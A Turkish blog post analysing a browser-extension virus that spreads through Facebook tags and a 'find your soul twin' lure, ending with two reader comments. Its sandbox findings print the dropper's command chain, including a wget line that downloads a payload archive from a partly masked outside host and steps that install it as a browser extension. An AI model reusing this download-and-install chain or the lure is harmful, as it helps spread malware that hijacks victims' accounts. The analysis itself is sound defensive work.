Merhabalar, bu yazımızda son günlerde yayılan tarayıcı virüsünden bahsedeceğim. Bu virüs oldukça iyi yayılmış. Virüsün yaptığı iş çok basit. Tarayıcınıza kendini eklenti olarak ekliyor ve sonucunda sizin Facebook profilinizi yayılmak ve çeşitli amaçlar (beğeni vs..) için kullanıyor. Bu virüsü bulmam ise son günlerde bazı arkadaşlarımın beni yorumlarda taglediğini fark etmem ile oldu. Resimde görüleceği üzere bir arkadaşım yorumda benden bahsetmiş.



Tıkladığımda ” Facebook’taki ruh ikizini bul” gibi bir gönderiye yönlendiriyor. Gönderide bu kesinlikle çalışıyor gibi ibare ve bir link mevcut.



Yorumda görüldüğü üzere kurbanlar bilinçleri dışında arkadaş listelerindeki tüm arkadaşlarını virüs sayesinde burada etiketliyor. Sonuç olarak arkadaşları buraya gelip linke tıkladıklarında resimdeki siteye yönlendiriyor.



Ortada kıytırıktan bir süreç çalışıyor. Sürecin sonunda ne mi oluyor dersiniz? Tabi ki sözde ruh ikizinizi görmeniz için virüsünü indirmenizi istiyor.



Aslında istemiyor da, alttaki resimde görüldüğü gibi çoğu tarayıcıda mousenizi hareket ettirince otomatik olarak indiriyor. Resimdeki yorumlar sizi kandırmasın. Bu sayfa yine resimde göreceğiniz gibi HTTRACK kullanarak bir siteden kopyalanmış. Bu yorumların hepsi aynı sürekli rastgele değişiyor



Evet dosyamızı indirdim.



Anubis’i kullanarak biraz inceleyelim. Alttaki resimde göreceğiniz üzere program paketlenmiş bir virüs. İçerisinde kendisi hariç 3 program daha bulunduruyor. Siz çalıştırdığınız zaman bu programları arşiv mantığıyla arşivden çıkarıyor ve ” install_browser.exe ” programını bilgisayarınızın başlangıcına ekliyor ve çalıştırıyor. Bunun haricinde kendisi işe yaramaz. Tarihten örnek vermek gerekirse Truva Atı mantığıyla çalışıyor. Bunu çalıştırdığınızda içindeki asıl iş yapacak programları ortaya çıkarıyor.



“C:\​Documents and Settings\​Administrator\​Application Data\​install_browser.exe”

Gelelim “install_browser.exe“ programına, bu program sisteminizde aşağıdaki dizinleri oluşturuyor.

C:\Fei
C:\Fei\50470

Ardından işe koyuluyor . Diğer programları (“wget.exe” ve “unzip.exe“) çalıştırıyor. Bu programlar aşağıdaki işlemleri gerçekleştiriyor.

C:\Documents and Settings\Administrator\Application Data\wget.exe
wget.exe -O “C:\Fei\50470\crx.zip” “http://bekiruser.com/a***s****.zip”
C:\Documents and Settings\Administrator\Application Data\install_browser.exe
“C:\Documents and Settings\Administrator\Application Data\install_browser.exe” /restart
C:\Documents and Settings\Administrator\Application Data\unzip.exe
unzip.exe -n “C:\Fei\50470\crx.zip” -d “C:\Fei\50470″

Sırayla açıklayayım. İlk olarak “wget.exe” çalışıyor. Bu program sayesinde ikinci satırda bulunan siteden bir arşiv dosyası indiriyor ve adını “crx.zip” olarak değiştiriyor. *** Koymamın sebebi küfür içermesi ).

Son olarak “install_browser.exe” tekrar çalışıp “crx.zip” içindeki eklenti dosyalarını tarayıcınıza ekliyor ve Facebook’unuzu kullanarak kendini yayıyor .

C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ChromePref.txt
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\OperaPref.txt
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\YandexPref.txt

Bu virüs antivirüslere yakalanıyor. Size bulaşmaması için ise yapacağınız tek şey; bu tür saçmalıklara inanmamak ve güncel bir antivirüs bulundurmak.

Güzel paylaşım, emeğine sağlık...

yakalananlar için spyhunter kullanmalarını tavsiye ederim, en ufak kırıntıya kadar bulup yok ediyor....